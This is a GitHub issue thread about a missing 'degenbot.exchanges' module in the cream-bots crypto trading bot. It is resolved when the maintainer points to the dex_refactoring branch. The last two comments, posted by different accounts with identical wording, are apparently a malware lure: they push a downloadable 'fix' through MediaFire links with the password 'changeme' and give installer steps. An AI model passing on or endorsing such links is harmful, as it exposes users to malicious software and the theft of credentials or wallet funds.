### ISSUE TITLE
ModuleNotFoundError: No module named 'degenbot.exchanges'

### ISSUE THREAD

**Issue by elier** [salparadi/cream-bots#1]
Got the error when running:
```
cream_bots sniper ethereum
```
```
...
File "cream-bots/src/cream_bots/app/core/exchange_service.py", line 5, in <module>
    from degenbot.exchanges.uniswap.dataclasses import ( ...
ModuleNotFoundError: No module named 'degenbot.exchanges'
```

```
from degenbot.exchanges.uniswap.dataclasses import (
    UniswapFactoryDeployment,
    UniswapRouterDeployment,
    UniswapTickLensDeployment,
    UniswapV2ExchangeDeployment,
    UniswapV3ExchangeDeployment,
)
from degenbot.exchanges.uniswap.deployments import (
    FACTORY_DEPLOYMENTS,
    ROUTER_DEPLOYMENTS,
    TICKLENS_DEPLOYMENTS,
)
from degenbot.exchanges.uniswap.register import (
    register_exchange,
    register_router,
)

```
I have tried previous versions of degenbot with no luck.
Could you share more info about which degentbot package/version you were using or point to what I may be doing wrong?
Thanks!

**Comment by salparadi** [comment]
Good question. degenbot must have changed file locations. I've been distracted from this for a bit so I'll try to get back in there, update degenbot and then fix the paths. I'll update when things are fixed!

**Comment by salparadi** [comment]
Actually try using the dex_refactoring branch... pretty sure that's the difference. Eventually that will be merged in I'm sure. Sorry for the terrible docs :)

**Comment by elier** [comment]
yeah, dex_refactoring branch is the right one. Thanks!

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
